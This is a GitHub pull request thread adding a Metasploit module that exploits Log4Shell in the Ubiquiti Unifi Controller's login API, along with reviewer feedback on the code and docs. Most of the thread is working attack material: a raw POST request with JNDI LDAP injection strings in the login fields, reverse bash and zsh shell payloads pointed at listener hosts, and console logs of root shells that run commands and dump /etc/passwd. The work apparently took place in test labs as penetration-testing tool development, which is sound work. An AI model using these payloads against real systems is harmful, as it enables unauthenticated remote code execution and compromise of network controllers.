Log4Shell: Unifi Controller RCE
rapid7/metasploit-framework pull request #16053
Opened 2022-01-14 15:20 UTC by zeroSteiner

**Requires the changes from #16050 to be introduced first** for the BeanFactory gadget chain as well as the JndiInjection mixin, unit tests are expected to fail until then because the module won't load.

This is an unauthenticated RCE in the Ubiquiti Unifi controller application, leveraging the Log4shell vulnerability. It has been tested on both the Linux docker container (v6.0.45 and 6.5.53) as well as the Windows application (v6.5.53). The injection point is within JSON data that is sent via a POST request to the `api/login` endpoint. Because the injection point is not within a header, the existing scanner module is incapable of detecting this particular instance so a basic check method that triggers the vulnerability is included within the module.

## Verification Steps
Steps for configuring Unifi are outlined within the module docs. Setup steps once the application is installed are the same for Windows as they are for the Docker container.

- [ ] Start msfconsole
- [ ]  Do: `use exploit/multi/http/vmware_vcenter_log4shell`
- [ ]  Set the `RHOSTS`, `TARGET`, `PAYLOAD`, and payload associated options
- [ ]  Do: `run`
- [ ] A session should be opened

## Example (Linux Docker Container)

```
msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell 
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Linux
TARGET => Linux
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RHOST 192.168.250.6
RHOST => 192.168.250.6
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set SRVHOST 192.168.250.134
SRVHOST => 192.168.250.134
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set LHOST 192.168.250.134
LHOST => 192.168.250.134
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set PAYLOAD cmd/unix/reverse_bash
PAYLOAD => cmd/unix/reverse_bash
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RPORT 8443
RPORT => 8443
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Command shell session 5 opened (192.168.250.134:4444 -> 192.168.250.6:44984 ) at 2022-01-14 09:21:04 -0500
[*] Server stopped.

id
uid=0(root) gid=0(root) groups=0(root)
pwd
/usr/lib/unifi
```

2022-01-18 20:34 UTC, h00die commented
I have OSX 11.2.3, went with linux and zsh payload.
Unifi Controller 5.6.42.

```
[*] Running automatic check ("set AutoCheck false" to disable)
####################
# Request:
####################
POST /api/login HTTP/1.1
Host: 1.1.1.2:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.44
Content-Type: application/json
Content-Length: 170

{"username":"${jndi:ldap://1.1.1.1:389/dc=nhrurg,dc=oiz}","password":"DurhbA41b3QDFEV","remember":"${jndi:ldap://1.1.1.1:389/dc=hnhyjc,dc=cqw}","strict":true}
####################
# Response:
####################
HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: Access-Control-Allow-Origin,Access-Control-Allow-Credentials
X-Frame-Options: DENY
Content-Type: application/json;charset=UTF-8
Content-Length: 72
Date: Tue, 18 Jan 2022 20:31:39 GMT
Connection: close

{ "data" : [ ] , "meta" : { "msg" : "api.err.Invalid" , "rc" : "error"}}
```

2022-01-18 21:34 UTC, h00die commented
unifi 5.12.35 with log4j 2.11.1 same result as above

2022-01-19 21:52 UTC, zeroSteiner commented
I went through and tested this a bit more thoroughly and it doesn't look like 5.12.35 is exploitable. 5.13.29 is the oldest version I was able to confirm is exploitable. In all cases that I tested the check method correctly identifies if the target is exploitable or not here so it's just a matter of documentation.

In cases where the target is exploitable, the message in the JSON response is `api.err.InvalidPayload` while targets that are not exploitable return `api.err.Invalid`.

2022-01-20 12:26 UTC, h00die commented
```
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > show options

Module options (exploit/multi/http/ubiquiti_unifi_log4shell):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LDIF_FILE                   no        Directory LDIF file path
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     111.111.1.11     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      8443             yes       The target port (TCP)
   SRVHOST    222.222.2.222    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    389              yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_zsh):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  222.222.2.222    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Linux


msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > run

[*] Started reverse TCP handler on 222.222.2.222:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Client sent unexpected request 2
[*] Command shell session 2 opened (222.222.2.222:4444 -> 111.111.1.11:50474 ) at 2022-01-20 07:20:22 -0500
[*] Server stopped.

id
uid=501(yourmom) gid=20(staff) groups=20(staff),501(access_bpf),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),399(com.apple.access_ssh),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),400(com.apple.access_remote_ae)
```

OSX 11.2.3 with UniFi Controller 5.14.22

2022-01-20 12:27 UTC, h00die commented
I'd also add a link to download the non-docker controllers for things like windows/osx testing: https://community.ui.com/releases?q=controller

2022-01-20 14:40 UTC, h00die reviewed
some small, mostly doc, changes

2022-01-20 14:40 UTC, h00die commented on documentation/modules/exploit/multi/http/ubiquiti_unifi_log4shell.md
> +### Unifi Controler on Windows Server 2016
remember which version? i like to add that in. also controller has 2 Ls

2022-01-20 14:40 UTC, h00die commented on documentation/modules/exploit/multi/http/ubiquiti_unifi_log4shell.md
> +### Unifi Controller on Docker
Controller v6.5.53

I like it in the heading so its bold and obvious

2022-01-20 14:40 UTC, h00die commented on documentation/modules/exploit/multi/http/ubiquiti_unifi_log4shell.md
> +
add in the OSX run: https://github.com/rapid7/metasploit-framework/pull/16053#issuecomment-1017445437

2022-01-20 14:40 UTC, h00die commented on modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
> +        ]
could add OSX as a target with `cmd/unix/reverse_zsh` payload, or change Linux to *nix or something similar.

2022-01-20 21:38 UTC, gwillcox-r7 requested changes

2022-01-20 21:38 UTC, gwillcox-r7 commented on modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
> +    Exploit::CheckCode::Vulnerable
```suggestion
    if @search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown
```

Potential way to simplify this code using a ternary operator, provided that ternary operators wouldn't be considered confusing potential readers of this code more.

2022-01-20 21:38 UTC, gwillcox-r7 commented on modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
> +    trigger
Given code below should we not also check if a response was received at this point? You seem to do a lot of validation in the `exploit` method that would likely be useful here. If you were just grabbing the banner version I'd say the current logic makes sense but since your also sending a JNI request, you could probably also use the same logic here.

2022-01-20 21:45 UTC, zeroSteiner commented on documentation/modules/exploit/multi/http/ubiquiti_unifi_log4shell.md
> +[*] Client sent unexpected request 2
That's part of the LDAP server, it's saying LDAP request code 2 was unexpected (because that service isn't fully implemented, just the necessary bits for exploitation). All the Log4Shell exploits use that same code base.

2022-01-20 21:47 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/ubiquiti_unifi_log4shell.md
> +[*] Client sent unexpected request 2
Alright thanks for confirming, marking resolved.

2022-01-20 21:50 UTC, zeroSteiner commented on modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
> +    trigger
You mean the logic to check the JSON body in the response that's included in the main exploit? The reason I added that there is so users that disable the `AutoCheck` option would still get a meaningful error if they targeted a system that was too old. Here it seems kind of redundant though because the ultimate authoritative answer would be whether or not an LDAP search query was received. From my testing, no version would return `api.err.Invalid` at this point because that's only returned by versions that are too old and those would have been filtered out before this by the version check.

2022-01-20 22:02 UTC, gwillcox-r7 commented on modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
> +    trigger
Hmm alright but would they actually see that a LDAP search query was received in the console itself? From the output I've seen in the documentation this doesn't seem to be the case, so I'm a little confused what visible way the user would see this.

As for the logic here, I'd say really my main point was that `trigger`  should be checked to see that it actually returns a response and is not `nil`. I agree the other checks may not be needed though if they aren't applicable at this stage.

2022-01-21 13:54 UTC, zeroSteiner commented on modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
> +    trigger
If the LDAP search query is received, the check result will be "Vulnerable" if it's not received it'll be Unknown. They'll see that through the console. I'll update it though to check if the HTTP response is `nil` though. The only thing that'll do is return Unknown faster without waiting for the LDAP request to be received.

2022-01-21 18:24 UTC, gwillcox-r7 approved these changes
LGTM will test this out now and then land, thanks for making these fixes!

2022-01-21 18:51 UTC, gwillcox-r7 commented
Works like a charm:

```
 ~/git/metasploit-framework │ land-pr16053:pr/16053 ?7  ./msfconsole       ✔ │ 3.0.2 Ruby 
                                                  

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com


       =[ metasploit v6.1.26-dev-458d584f83               ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post       ]
+ -- --=[ 600 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params 
set LHOST eth0

[*] Starting persistent handler(s)...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/http/ubiquiti_unifi_log4shell 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Unix 
TARGET => Unix
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > show options

Module options (exploit/multi/http/ubiquiti_unifi_log4shell):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LDIF_FILE                   no        Directory LDIF file path
   Proxies                     no        A proxy chain of format type:host:port[,type:hos
                                         t:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), see https://github.com/rapid
                                         7/metasploit-framework/wiki/Using-Metasploit
   RPORT      8443             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on
                                         . This must be an address on the local machine o
                                         r 0.0.0.0 to listen on all addresses.
   SRVPORT    389              yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Unix


msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set LHOST docker0
LHOST => 172.18.0.1
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set SRVHOST docker0
SRVHOST => 172.18.0.1
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > check

[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (Permission denied - bind(2) for 172.18.0.1:389).
[-] 127.0.0.1:8443 - Check failed: The state could not be determined.
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set SRVPORT 8833
SRVPORT => 8833
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > check
[+] 127.0.0.1:8443 - The target is vulnerable.
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > exploit

[*] Started reverse TCP handler on 172.18.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Server stopped.
[*] Command shell session 1 opened (172.18.0.1:4444 -> 172.18.0.2:35512 ) at 2022-01-21 12:48:42 -0600

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
uname -a
Linux feafb1f049db 5.15.0-17-generic #17-Ubuntu SMP Thu Jan 13 16:27:23 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
ls
bin
data
dl
lib
logs
run
webapps
work
cd bin
ls
mongod
ubnt-apttool
unifi.init
pwd
/usr/lib/unifi/bin
cat /etc/version
cat: /etc/version: No such file or directory
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
unifi:x:999:999::/home/unifi:/bin/sh
mongodb:x:101:102::/var/lib/mongodb:/usr/sbin/nologin
```

2022-01-21 18:52 UTC, merged

2022-01-21 18:55 UTC, gwillcox-r7 commented
# Release Notes
A module has been added to exploit CVE-2021-44228, an unauthenticated RCE in the Ubiquiti Unifi controller application versions 5.13.29 through 6.5.53 in the `remember` field of a POST request to the `/api/login` page. Successful exploitation results in OS command execution in the context of the server application.